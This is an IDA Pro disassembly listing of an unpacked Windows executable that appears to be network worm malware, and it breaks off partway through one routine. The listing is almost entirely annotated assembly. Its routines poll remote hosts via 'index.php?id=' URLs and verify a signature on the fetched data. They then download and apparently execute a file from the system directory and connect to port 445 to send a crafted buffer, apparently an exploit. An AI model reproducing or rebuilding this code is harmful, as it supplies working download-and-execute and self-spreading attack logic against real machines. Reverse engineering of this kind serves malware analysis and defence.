;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 58BDA4DCB3A1B7448A18D15772543A55
; File Name : u:\work\58bda4dcb3a1b7448a18d15772543a55_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31600000
; Section 1. (virtual address 00001000)
; Virtual size : 00004000 ( 16384.)
; Section size in file : 00004000 ( 16384.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31601000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31601000 dd 77DD590Bh ; DATA XREF: sub_316028A7+1A�r
dword_31601004 dd 77DD59F0h ; DATA XREF: sub_316028A7+38�r
dword_31601008 dd 77DD23D7h ; DATA XREF: sub_3160284E+3E�r
dword_3160100C dd 77DD22EAh ; DATA XREF: sub_31602819+14�r
; sub_3160284E+1D�r
dword_31601010 dd 77DD5C55h ; DATA XREF: sub_31602819+24�r
dword_31601014 dd 77DD189Ah ; DATA XREF: sub_31602819+2D�r
; sub_3160284E+4E�r ...
dword_31601018 dd 77E2A571h ; DATA XREF: sub_3160238C+16F�r
dword_3160101C dd 77DE089Eh ; DATA XREF: sub_31601774+17�r
dword_31601020 dd 77DE07A3h ; DATA XREF: sub_31601774+30�r
dword_31601024 dd 77DE0D79h ; DATA XREF: sub_31601774+4D�r
dword_31601028 dd 77DE0343h ; DATA XREF: sub_31601774+5B�r
dword_3160102C dd 77DE0AF0h ; DATA XREF: sub_31601758+8�r
dword_31601030 dd 77DE042Eh ; DATA XREF: sub_31601758+12�r
dword_31601034 dd 77DDEBA2h ; DATA XREF: sub_31601709+6�r
dword_31601038 dd 77DE0BB2h ; DATA XREF: sub_31601709+3D�r
align 10h
dword_31601040 dd 77E79E34h ; DATA XREF: sub_31602C7E+B�r
dword_31601044 dd 77E7980Ah ; DATA XREF: sub_31602C6A+D�r
dword_31601048 dd 77E7A099h ; DATA XREF: sub_31602B2C+17�r
dword_3160104C dd 77E76A2Eh ; DATA XREF: sub_31602B2C+E9�r
dword_31601050 dd 77E6BD13h ; DATA XREF: sub_31602A60+71�r
dword_31601054 dd 77E684C6h ; DATA XREF: sub_31602A60+B0�r
dword_31601058 dd 77EBB1E7h ; DATA XREF: sub_31602CEC�r
dword_3160105C dd 77EBA595h ; DATA XREF: sub_31602CE6�r
dword_31601060 dd 77E616B4h ; DATA XREF: sub_316028FA+9B�r
dword_31601064 dd 77EBA6E9h ; DATA XREF: sub_31602CE0�r
dword_31601068 dd 77E73167h ; DATA XREF: sub_316026DE+13�r
; sub_31602B2C+8F�r
dword_3160106C dd 77E737DEh ; DATA XREF: sub_3160238C+BA�r
dword_31601070 dd 77E79D5Bh ; DATA XREF: sub_31602378+8�r
dword_31601074 dd 77E73628h ; DATA XREF: UPX0:31602320�r
; sub_31602A60+F�r
dword_31601078 dd 77E79D8Ch ; DATA XREF: sub_316011A0+ED�r
dword_3160107C dd 77E77963h ; DATA XREF: sub_316011A0+B9�r
; sub_316011A0+F6�r ...
dword_31601080 dd 77E7A837h ; DATA XREF: sub_316011A0+8F�r
; sub_3160219E+57�r
dword_31601084 dd 77E74672h ; DATA XREF: sub_316011A0+5A�r
; sub_31601422+64�r ...
dword_31601088 dd 77E74155h ; DATA XREF: sub_316011A0+3D�r
; sub_31602A60+40�r
dword_3160108C dd 77E704FCh ; DATA XREF: sub_316011A0+37�r
; sub_31602A60+1B�r
dword_31601090 dd 77E7513Ch ; DATA XREF: sub_316015C7+29�r
dword_31601094 dd 77E61BE6h ; DATA XREF: sub_3160169C+4E�r
; sub_316017DB+16C�r ...
dword_31601098 dd 77E775F1h ; DATA XREF: sub_3160169C+2�r
dword_3160109C dd 77E73BEFh ; DATA XREF: sub_316017DB+4F�r
dword_316010A0 dd 77E79C90h ; DATA XREF: sub_31601D42+4D�r
dword_316010A4 dd 77E7A5FDh ; DATA XREF: sub_31601D42+13�r
; sub_31601DCA+2C�r
dword_316010A8 dd 77E805D8h ; DATA XREF: sub_31601D42+D�r
; sub_3160238C+108�r
dword_316010AC dd 77E61A90h ; DATA XREF: sub_31601DCA+BC�r
dword_316010B0 dd 77E706B7h ; DATA XREF: sub_31601DCA+8A�r
; sub_316028FA+92�r
dword_316010B4 dd 77E79F93h ; DATA XREF: sub_31601DCA+26�r
; UPX0:31602310�r
dword_316010B8 dd 77E7751Ah ; DATA XREF: sub_31601ED5+12�r
dword_316010BC dd 77E7C2C4h ; DATA XREF: sub_31601F03+8�r
dword_316010C0 dd 77E7AC37h ; DATA XREF: sub_31601F12+12�r
; sub_31601F2C+12�r
dword_316010C4 dd 77E61BB8h ; DATA XREF: sub_31601F7D+38�r
dword_316010C8 dd 77E74A3Bh ; DATA XREF: sub_31602028+13�r
dword_316010CC dd 77E73AB3h ; DATA XREF: sub_31602028+8�r
dword_316010D0 dd 77E73C49h ; DATA XREF: sub_31602058+137�r
; sub_3160219E+66�r ...
dword_316010D4 dd 77E777EFh ; DATA XREF: sub_31602058+F4�r
; sub_3160258F+3F�r ...
dword_316010D8 dd 77E78B82h ; DATA XREF: sub_3160219E+92�r
dword_316010DC dd 77E793EFh ; DATA XREF: sub_3160219E+6E�r
dword_316010E0 dd 77E75CB5h ; DATA XREF: UPX0:3160234A�r
; sub_31602A60+C3�r
dword_316010E4 dd 77F5157Dh, 0 ; DATA XREF: UPX0:3160233B�r
dword_316010EC dd 77C35280h ; DATA XREF: sub_31601ED5+22�r
dword_316010F0 dd 77C42E10h ; DATA XREF: sub_31602CA2�r
dword_316010F4 dd 77C43710h ; DATA XREF: sub_31602C9C�r
dword_316010F8 dd 77C43490h ; DATA XREF: sub_31602C96�r
dword_316010FC dd 77C3528Dh ; DATA XREF: sub_3160169C:loc_316016C7�r
; sub_31601F4D:loc_31601F5E�r ...
dword_31601100 dd 77C33EB0h ; DATA XREF: sub_31602C90�r
dword_31601104 dd 77C43AB0h ; DATA XREF: sub_31601422+3C�r
; sub_31602058:loc_31602089�r ...
dword_31601108 dd 77C43500h ; DATA XREF: sub_31601316+37�r
; sub_31601422+AA�r
align 10h
dword_31601110 dd 77D4BDCAh ; DATA XREF: sub_31601DCA+5D�r
dword_31601114 dd 77D4456Bh ; DATA XREF: sub_31601DCA+67�r
dword_31601118 dd 77D45CBCh ; DATA XREF: sub_31601DCA+7A�r
dword_3160111C dd 77D4C96Ah ; DATA XREF: sub_316015C7+5D�r
; sub_316015C7+77�r ...
dd 0
dword_31601124 dd 76214750h ; DATA XREF: sub_316011A0+A9�r
; sub_316015C7+9D�r
dword_31601128 dd 7620AFB6h ; DATA XREF: sub_316011A0+18�r
; sub_316015C7+89�r
dword_3160112C dd 76204E4Dh ; DATA XREF: sub_316015C7+C2�r
dword_31601130 dd 762211EFh ; DATA XREF: sub_31602012+8�r
; UPX0:3160276E�r
dword_31601134 dd 7620BD61h ; DATA XREF: sub_316011A0+DB�r
; sub_316015C7+B0�r
dd 0
dword_3160113C dd 71AB41DAh ; DATA XREF: sub_316022E2+10�r
dword_31601140 dd 71AB3ECEh ; DATA XREF: sub_3160219E+100�r
dword_31601144 dd 71AB5DE2h ; DATA XREF: sub_3160219E+10D�r
dword_31601148 dd 71AB868Dh ; DATA XREF: sub_3160219E+120�r
dword_3160114C dd 71AB32CAh ; DATA XREF: sub_31601FD3+C�r
dword_31601150 dd 71AB1740h ; DATA XREF: sub_31601FD3+17�r
dword_31601154 dd 71AB2BBFh ; DATA XREF: sub_31601FD3+25�r
dword_31601158 dd 71AB3C22h ; DATA XREF: sub_316017DB+2B�r
; sub_3160219E+AC�r
dword_3160115C dd 71AB401Ch ; DATA XREF: sub_316017DB+44�r
; sub_316026DE+D�r
dword_31601160 dd 71AB1746h ; DATA XREF: sub_316017DB+147�r
; sub_3160219E+F0�r
dword_31601164 dd 71AB3E5Dh ; DATA XREF: sub_316017DB+15D�r
dword_31601168 dd 71AB1AF4h ; DATA XREF: sub_316017DB+17B�r
; sub_31602058+67�r ...
dword_3160116C dd 71AB5690h ; DATA XREF: sub_316017DB+1A4�r
; sub_316017DB+1D8�r ...
dword_31601170 dd 71AB8629h ; DATA XREF: sub_316017DB+550�r
; sub_31602058+128�r
dword_31601174 dd 71AB1A6Dh ; DATA XREF: sub_316017DB+559�r
; sub_31602058+12F�r
align 10h
dword_31601180 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_31601422+5�o
dd offset nullsub_1
align 10h
dword_31601190 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_3160238C+5�o
dd offset nullsub_2
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_316011A0 proc near ; CODE XREF: sub_31601422+16D�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31601128 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_316011CB
push 1
jmp loc_31601261
; ---------------------------------------------------------------------------
loc_316011CB: ; CODE XREF: sub_316011A0+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_3160108C ; GetSystemDirectoryA
mov edi, dword_31601088
lea eax, [ebp+var_110]
push offset dword_316041F8
push eax
call edi ; lstrcat
lea eax, [ebp+var_110]
push 6
push eax
call dword_31601084 ; lstrlen
lea eax, [ebp+eax+var_110]
push eax
call sub_31601F4D
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset dword_316041F0
push eax
call edi ; lstrcat
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_31601080 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_31601241
push 2
jmp short loc_31601261
; ---------------------------------------------------------------------------
loc_31601241: ; CODE XREF: sub_316011A0+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_31601124 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_31601264
push [ebp+var_4]
call dword_3160107C ; CloseHandle
push 3
loc_31601261: ; CODE XREF: sub_316011A0+26�j
; sub_316011A0+9F�j
pop eax
jmp short loc_316012B5
; ---------------------------------------------------------------------------
loc_31601264: ; CODE XREF: sub_316011A0+B4�j
mov edi, 100000h
push edi
call sub_31602C6A
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31601134 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_31601078 ; WriteFile
push [ebp+var_4]
call dword_3160107C ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_31601F7D
push ebx
call sub_31602C7E
add esp, 0Ch
xor eax, eax
loc_316012B5: ; CODE XREF: sub_316011A0+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_316011A0 endp
; =============== S U B R O U T I N E =======================================
sub_316012BA proc near ; CODE XREF: sub_31601422+F8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push ebx
push esi
push edi
or edi, 0FFFFFFFFh
inc eax
push 0Fh
lea esi, [ecx+1]
sub edi, ecx
pop ecx
loc_316012D1: ; CODE XREF: sub_316012BA+56�j
mov dl, [eax]
mov bl, [eax-1]
add edx, ecx
add bl, cl
sar edx, 4
and dl, 3
sub dl, [esp+0Ch+arg_8]
shl bl, 2
or dl, bl
mov [esi-1], dl
mov dl, [eax+1]
mov bl, [eax]
dec dl
add bl, cl
and dl, cl
sub dl, [esp+0Ch+arg_8]
add eax, 3
shl bl, 4
and bl, 0F0h
or dl, bl
mov [esi], dl
inc esi
inc esi
lea edx, [edi+esi]
cmp edx, 30h
jl short loc_316012D1
pop edi
pop esi
pop ebx
retn
sub_316012BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31601316 proc near ; CODE XREF: sub_3160139B+27�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_31601349
add ebx, 1Ah
loc_31601349: ; CODE XREF: sub_31601316+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_31601108
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31601373
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_31601396
; ---------------------------------------------------------------------------
loc_31601373: ; CODE XREF: sub_31601316+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31601393
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_31601396
; ---------------------------------------------------------------------------
loc_31601393: ; CODE XREF: sub_31601316+68�j
mov al, [ebp+arg_0]
loc_31601396: ; CODE XREF: sub_31601316+5B�j
; sub_31601316+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_31601316 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3160139B proc near ; CODE XREF: sub_31601422+D6�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_316013F8
mov edi, [ebp+arg_0]
push ebx
loc_316013B0: ; CODE XREF: sub_3160139B+58�j
sub al, 2
inc [ebp+arg_4]
mov bl, al
mov eax, esi
neg eax
mov byte ptr [ebp+arg_0], bl
push eax
push [ebp+arg_0]
call sub_31601316
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_316013DC
cmp bl, 7Ah
jg short loc_316013DC
movsx esi, bl
sub esi, 61h
loc_316013DC: ; CODE XREF: sub_3160139B+34�j
; sub_3160139B+39�j
cmp bl, 41h
jl short loc_316013EC
cmp bl, 5Ah
jg short loc_316013EC
movsx esi, bl
sub esi, 41h
loc_316013EC: ; CODE XREF: sub_3160139B+44�j
; sub_3160139B+49�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_316013B0
pop ebx
jmp short loc_316013FB
; ---------------------------------------------------------------------------
loc_316013F8: ; CODE XREF: sub_3160139B+F�j
mov edi, [ebp+arg_0]
loc_316013FB: ; CODE XREF: sub_3160139B+5B�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_3160139B endp
; =============== S U B R O U T I N E =======================================
sub_31601402 proc near ; CODE XREF: sub_31601422+104�p
arg_0 = dword ptr 4
xor eax, eax
xor ecx, ecx
loc_31601406: ; CODE XREF: sub_31601402+12�j
mov edx, [esp+arg_0]
movzx edx, byte ptr [ecx+edx]
add eax, edx
inc ecx
cmp ecx, 30h
jl short loc_31601406
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, edx
add eax, 61h
retn
sub_31601402 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31601422 proc near ; CODE XREF: sub_316015C7+B7�p
var_174 = dword ptr -174h
var_170 = byte ptr -170h
var_168 = byte ptr -168h
var_164 = byte ptr -164h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = byte ptr -124h
var_11C = byte ptr -11Ch
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31601180
push offset sub_31602C90
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 164h
push ebx
push esi
push edi
mov [ebp+var_128], 1
and [ebp+var_4], 0
push offset aZer0 ; "zer0"
push [ebp+arg_0]
call dword_31601104 ; strstr
pop ecx
pop ecx
mov edi, eax
mov [ebp+var_130], edi
test edi, edi
jz loc_316015A8
add edi, 4
mov [ebp+var_130], edi
jz loc_316015A8
push edi
call dword_31601084 ; lstrlen
mov [ebp+var_1C], eax
cmp eax, 50h
jle loc_316015A8
and byte ptr [edi+100h], 0
mov al, [edi]
mov [ebp+var_168], al
movsx ebx, al
sub ebx, 61h
mov [ebp+var_12C], ebx
js loc_316015A8
cmp ebx, 1Ah
jge loc_316015A8
inc edi
mov [ebp+var_130], edi
push 7Eh
push edi
call dword_31601108 ; strchr
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_134], esi
test esi, esi
jz loc_316015A8
mov al, [esi]
mov [ebp+var_170], al
and byte ptr [esi], 0
push ebx
push edi
lea eax, [ebp+var_11C]
push eax
call sub_3160139B
mov al, [ebp+var_170]
mov [esi], al
inc esi
mov [ebp+var_130], esi
xor edi, edi
push edi
lea eax, [ebp+var_164]
push eax
lea eax, [esi+1]
push eax
call sub_316012BA
lea eax, [ebp+var_164]
push eax
call sub_31601402
add esp, 1Ch
cmp [esi], al
jnz short loc_316015A8
push 44h
push offset dword_31604000
lea eax, [ebp+var_124]
push eax
call sub_31601709
add esp, 0Ch
lea eax, [ebp+var_174]
push eax
push 30h
lea eax, [ebp+var_164]
push eax
lea eax, [ebp+var_11C]
push eax
call dword_31601084 ; lstrlen
push eax
lea eax, [ebp+var_11C]
push eax
lea eax, [ebp+var_124]
push eax
call sub_31601774
add esp, 18h
test eax, eax
jnz short loc_3160159B
cmp [ebp+var_174], edi
jz short loc_3160159B
lea eax, [ebp+var_11C]
push eax
call sub_316011A0
pop ecx
mov [ebp+var_128], edi
loc_3160159B: ; CODE XREF: sub_31601422+15C�j
; sub_31601422+164�j
lea eax, [ebp+var_124]
push eax
call sub_31601758
pop ecx
loc_316015A8: ; CODE XREF: sub_31601422+4E�j
; sub_31601422+5D�j ...
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
mov eax, [ebp+var_128]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_31601422 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_316015C7 proc near ; CODE XREF: sub_3160169C+24�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
push 4000h
call sub_31602C6A
pop ecx
mov esi, eax
lea eax, [ebp+var_E8]
push 63h
push eax
push 7
push 400h
call dword_31601090 ; GetLocaleInfoA
xor ebx, ebx
cmp [ebp+arg_4], bl
jz short loc_3160162F
lea eax, [ebp+var_E8]
push eax
lea eax, [ebp+var_84]
push dword_31604FCC
push dword_31604FE4
push offset aPiatvxkotmgvos ; "piatvxkotmgvosdrr"
push [ebp+arg_0]
push offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"...
push eax
call dword_3160111C ; wsprintfA
add esp, 1Ch
jmp short loc_31601647
; ---------------------------------------------------------------------------
loc_3160162F: ; CODE XREF: sub_316015C7+34�j
push [ebp+arg_0]
lea eax, [ebp+var_84]
push offset aHttpS ; "http://%s"
push eax
call dword_3160111C ; wsprintfA
add esp, 0Ch
loc_31601647: ; CODE XREF: sub_316015C7+66�j
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31601128 ; InternetOpenA
push ebx
mov edi, eax
push ebx
push ebx
lea eax, [ebp+var_84]
push ebx
push eax
push edi
call dword_31601124 ; InternetOpenUrlA
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push 2000h
push esi
push ebx
call dword_31601134 ; InternetReadFile
push esi
call sub_31601422
push esi
call sub_31602C7E
mov esi, dword_3160112C
pop ecx
pop ecx
push ebx
call esi ; InternetCloseHandle
push edi
call esi ; InternetCloseHandle
pop edi
pop esi
pop ebx
leave
retn
sub_316015C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_3160169C proc near ; DATA XREF: sub_3160238C+14D�o
push esi
push edi
mov edi, dword_31601098
loc_316016A4: ; CODE XREF: sub_3160169C+6B�j
xor esi, esi
loc_316016A6: ; CODE XREF: sub_3160169C+57�j
inc esi
inc esi
call sub_31602012
test eax, eax
jz short loc_316016C7
mov al, byte_31604080[esi+esi*4]
push eax
push off_31604081[esi+esi*4]
call sub_316015C7
pop ecx
pop ecx
loc_316016C7: ; CODE XREF: sub_3160169C+13�j
call dword_316010FC ; rand
push 3
cdq
pop ecx
idiv ecx
add esi, edx
call sub_31602042
xor edx, edx
mov ecx, 493E0h
div ecx
add edx, 61B48h
push edx
call dword_31601094 ; Sleep
cmp esi, 16h
jb short loc_316016A6
push 0
push offset dword_31604FE4
call edi ; InterlockedExchange
push 0
push offset dword_31604FCC
call edi ; InterlockedExchange
jmp short loc_316016A4
sub_3160169C endp
; =============== S U B R O U T I N E =======================================
sub_31601709 proc near ; CODE XREF: sub_31601422+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, dword_31601034
push edi
xor edi, edi
push edi
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_31601736
push 8
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_31601736
push 1
pop eax
jmp short loc_31601754
; ---------------------------------------------------------------------------
loc_31601736: ; CODE XREF: sub_31601709+19�j
; sub_31601709+26�j
lea eax, [ebx+4]
push eax
push edi
push edi
push [esp+18h+arg_8]
push [esp+1Ch+arg_4]
push dword ptr [ebx]
call dword_31601038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_31601754: ; CODE XREF: sub_31601709+2B�j
pop edi
pop esi
pop ebx
retn
sub_31601709 endp
; =============== S U B R O U T I N E =======================================
sub_31601758 proc near ; CODE XREF: sub_31601422+180�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+4]
call dword_3160102C ; CryptDestroyKey
push 0
push dword ptr [esi]
call dword_31601030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_31601758 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31601774 proc near ; CODE XREF: sub_31601422+152�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_0]
xor edi, edi
push eax
push edi
push edi
push 8003h
push dword ptr [esi]
call dword_3160101C ; CryptCreateHash
test eax, eax
jnz short loc_3160179A
push 1
pop eax
jmp short loc_316017D7
; ---------------------------------------------------------------------------
loc_3160179A: ; CODE XREF: sub_31601774+1F�j
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31601020 ; CryptHashData
test eax, eax
jnz short loc_316017B3
push 2
pop edi
jmp short loc_316017CC
; ---------------------------------------------------------------------------
loc_316017B3: ; CODE XREF: sub_31601774+38�j
push edi
push edi
push dword ptr [esi+4]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call dword_31601024 ; CryptVerifySignatureA
mov ecx, [ebp+arg_14]
mov [ecx], eax
loc_316017CC: ; CODE XREF: sub_31601774+3D�j
push [ebp+arg_0]
call dword_31601028 ; CryptDestroyHash
mov eax, edi
loc_316017D7: ; CODE XREF: sub_31601774+24�j
pop edi
pop esi
pop ebp
retn
sub_31601774 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_316017DB proc near ; CODE XREF: sub_3160252B+36�p
; sub_3160258F+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31602CB0
mov eax, dword_31604C84
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_31604C88
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_31601158 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_31601D3B
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_3160115C ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_3160109C ; lstrcpyn
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_31604C78
push eax
call dword_3160111C ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_3160184E: ; CODE XREF: sub_316017DB+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_3160184E
push 60h
lea eax, [ebp+var_E4]
push offset dword_31604798
push eax
call sub_31602CA2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31602C9C ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_31602CA2 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_31602C9C ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_31602CA2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31602C9C ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_31602CA2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31602C9C ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_31602CA2 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31602C96 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31602C96 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31601160 ; htons
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31601164 ; connect
cmp eax, 0FFFFFFFFh
jz loc_31601D31
mov esi, dword_31601094
mov edi, 0C8h
push edi
call esi ; Sleep
push ebx
mov ebx, dword_31601168
push 89h
push offset dword_31604580
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3160116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31601D26
push 0
push 0A8h
